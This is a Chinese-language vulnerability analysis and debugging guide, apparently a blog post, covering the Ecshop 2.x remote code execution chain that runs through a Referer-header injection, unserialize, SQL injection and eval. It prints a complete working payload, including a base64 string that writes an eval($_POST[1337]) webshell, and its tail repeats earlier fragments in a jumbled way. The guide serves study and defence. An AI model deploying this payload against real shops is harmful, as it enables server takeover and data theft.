Ecshop 2.x 代码执行漏洞分析与调试指南<\/h1>

一、漏洞背景<\/h2>
Ecshop 2.x 版本存在一个严重的远程代码执行漏洞，攻击者可以利用该漏洞直接远程写入webshell，获取服务器控制权限。该漏洞利用链构造精巧，需要对系统有深入了解才能实现。<\/p>

二、环境搭建<\/h2>

1. 所需工具<\/h3>

PHPStudy（集成环境）<\/li>
PHPStorm（IDE）<\/li>
XDebug（PHP调试扩展）<\/li>
Chrome浏览器 + JetBrains IDE Support插件<\/li>

Burp Suite（用于抓包测试）<\/li> <\/ul>

2. XDebug配置<\/h3>

修改php.ini文件，添加以下配置：<\/p>

[XDebug]<\/span>
<\/span><\/span>xdebug.profiler_append<\/span> =<\/span> 0<\/span>
<\/span><\/span>xdebug.profiler_enable<\/span> =<\/span> 1<\/span>
<\/span><\/span>xdebug.profiler_enable_trigger<\/span> =<\/span> 0<\/span>
<\/span><\/span>xdebug.profiler_output_dir<\/span> =<\/span> "C:\phpStudy\tmp\xdebug"<\/span>
<\/span><\/span>xdebug.trace_output_dir<\/span> =<\/span> "C:\phpStudy\tmp\xdebug"<\/span>
<\/span><\/span>xdebug.profiler_output_name<\/span> =<\/span> "cache.out.%t-%s"<\/span>
<\/span><\/span>xdebug.remote_enable<\/span> =<\/span> 1<\/span>
<\/span><\/span>xdebug.remote_handler<\/span> =<\/span> "dbgp"<\/span>
<\/span><\/span>xdebug.remote_host<\/span> =<\/span> "127.0.0.1"<\/span>
<\/span><\/span>zend_extension<\/span> =<\/span> "C:\phpStudy\php53\ext\xdebug.dll"<\/span>
<\/span><\/span>xdebug.remote_port<\/span> =<\/span> 9000<\/span>
<\/span><\/span>xdebug.idekey<\/span> =<\/span> PHPSTROM<\/span>
<\/span><\/span><\/code><\/pre>3. PHPStorm配置<\/h3>

设置PHP版本与本地环境一致<\/li>
配置调试端口为9000<\/li>
设置项目根目录<\/li>
确保Chrome插件已安装并启用<\/li>
<\/ol>
三、漏洞分析<\/h2>
1. 漏洞触发点<\/h3>
漏洞起始于user.php<\/code>的act=login<\/code>操作，通过控制HTTP Referer头触发漏洞。<\/p>
2. 攻击Payload分析<\/h3>
示例Payload：<\/p>
554fcae493e564ee0dc75bdf2ebf94caads|a:2:{s:3:"num";s:280:"*\/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -";s:2:"id";s:3:
<\/code><\/pre>
Payload分解：<\/p>

554fcae493e564ee0dc75bdf2ebf94ca<\/code> - 哈希值，用于通过系统验证<\/li>
ads<\/code> - 控制程序流程进入insert_ads<\/code>函数<\/li>
序列化数据部分 - 包含SQL注入和PHP代码执行payload<\/li>
<\/ol>
解码后的核心恶意代码：<\/p>
{$asd'];assert(base64_decode('<\/span>file_put_contents<\/span>('1.php'<\/span>,'<\/span><?<\/span>php<\/span> eval<\/span>($_POST[1337<\/span>]xxx<\/span>
<\/span><\/span><\/code><\/pre>3. 漏洞利用流程<\/h3>

通过Referer头注入恶意payload<\/li>
系统验证哈希值554fcae493e564ee0dc75bdf2ebf94ca<\/code><\/li>
进入insert_ads<\/code>函数处理流程<\/li>
反序列化攻击payload<\/li>
通过SQL注入将恶意代码写入数据库<\/li>
最终通过eval<\/code>执行写入webshell的操作<\/li>
<\/ol>
四、动态调试技巧<\/h2>
1. 调试快捷键<\/h3>

F7<\/strong> - 进入函数<\/li>
F8<\/strong> - 步过（不进入函数）<\/li>
Shift+F8<\/strong> - 跳出当前函数<\/li>
Ctrl+Alt+点击<\/strong> - 快速进入函数定义<\/li>
Alt+F7<\/strong> - 查找函数\/变量引用<\/li>
<\/ul>
2. 关键调试点<\/h3>

在user.php<\/code>的act=login<\/code>处设置断点<\/li>
跟踪$back_act<\/code>变量的赋值过程<\/li>
观察insert_mod<\/code>函数的动态调用过程<\/li>
监控反序列化过程（unserialize<\/code>）<\/li>
跟踪SQL语句拼接过程<\/li>
观察eval<\/code>函数的最终执行<\/li>
<\/ol>
3. 调试中修改变量<\/h3>
在调试过程中可以右键变量选择Set Value<\/code>来修改值，模拟攻击流程：<\/p>
ads|a:2:{s:3:\"num\";s:280:\"*\/ union select 1,0x272f2a,3,4,5,6,7,8,0x7b24617364275d3b617373657274286261736536345f6465636f646528275a6d6c735a56397764585266593239756447567564484d6f4a7a4575634768774a79776e50443977614841675a585a686243676b58314250553152624d544d7a4e3130704f79412f506963702729293b2f2f7d787878,10-- -\";s:2:\"id\";s:3:
<\/code><\/pre>
五、漏洞原理详解<\/h2>


哈希验证绕过<\/strong>：系统会检查特定的哈希值554fcae493e564ee0dc75bdf2ebf94ca<\/code>，这是攻击链的第一个关键点。<\/p>
<\/li>

函数流程控制<\/strong>：通过ads<\/code>后缀控制程序进入insert_ads<\/code>函数。<\/p>
<\/li>

反序列化漏洞<\/strong>：攻击者控制的序列化数据被反序列化，注入恶意参数。<\/p>
<\/li>

SQL注入<\/strong>：通过精心构造的SQL语句将PHP代码写入数据库查询结果。<\/p>
<\/li>

代码执行<\/strong>：最终通过eval<\/code>函数执行从数据库获取的恶意代码，实现webshell写入。<\/p>
<\/li>
<\/ol>
关键代码处理流程：<\/p>

preg_replace<\/code>处理掉{<\/code>字符<\/li>
通过fetch_str<\/code>处理payload<\/li>
在select<\/code>函数中进入get_val<\/code><\/li>
substr<\/code>去掉$<\/code>符号<\/li>
make_var<\/code>完成最终拼接<\/li>
eval<\/code>执行恶意代码<\/li>
<\/ol>
最终执行的payload形式：<\/p>
$this-><\/span>_var<\/span>['asd'<\/span>];assert<\/span>(base64_decode<\/span>('ZmlsZV9wdXRfY29udGVudHMoJzEucGhwJywnPD9waHAgZXZhbCgkX1BPU1RbMTMzN10pOyA\/Picp'<\/span>))
<\/span><\/span><\/code><\/pre>六、防护建议<\/h2>

升级到最新版本的Ecshop<\/li>
对用户输入进行严格过滤，特别是Referer头<\/li>
禁用危险的函数如eval<\/code>、assert<\/code>等<\/li>
对反序列化操作进行严格限制<\/li>
使用预处理语句防止SQL注入<\/li>
对关键操作添加二次验证<\/li>
<\/ol>
七、总结<\/h2>
通过动态调试可以清晰理解：<\/p>

攻击payload在每个环节的处理过程<\/li>
系统如何从正常流程转向恶意代码执行<\/li>
各个函数之间的调用关系和数据处理<\/li>
最终漏洞触发的完整链条<\/li>
<\/ol>
这种分析方法不仅适用于此漏洞，也可以应用于其他复杂漏洞的分析过程，有助于提升漏洞挖掘和利用构造能力。<\/p>

Ecshop 2.x 代码执行漏洞分析与调试指南<\/h1>

一、漏洞背景<\/h2> Ecshop 2.x 版本存在一个严重的远程代码执行漏洞，攻击者可以利用该漏洞直接远程写入webshell，获取服务器控制权限。该漏洞利用链构造精巧，需要对系统有深入了解才能实现。<\/p>

二、环境搭建<\/h2>

三、漏洞分析<\/h2>

1. 漏洞触发点<\/h3> 漏洞起始于user.php<\/code>的act=login<\/code>操作，通过控制HTTP Referer头触发漏洞。<\/p>

四、动态调试技巧<\/h2>

一、漏洞背景<\/h2>
Ecshop 2.x 版本存在一个严重的远程代码执行漏洞，攻击者可以利用该漏洞直接远程写入webshell，获取服务器控制权限。该漏洞利用链构造精巧，需要对系统有深入了解才能实现。<\/p>

1. 漏洞触发点<\/h3>
漏洞起始于`user.php<\/code>的act=login<\/code>操作，通过控制HTTP Referer头触发漏洞。<\/p>`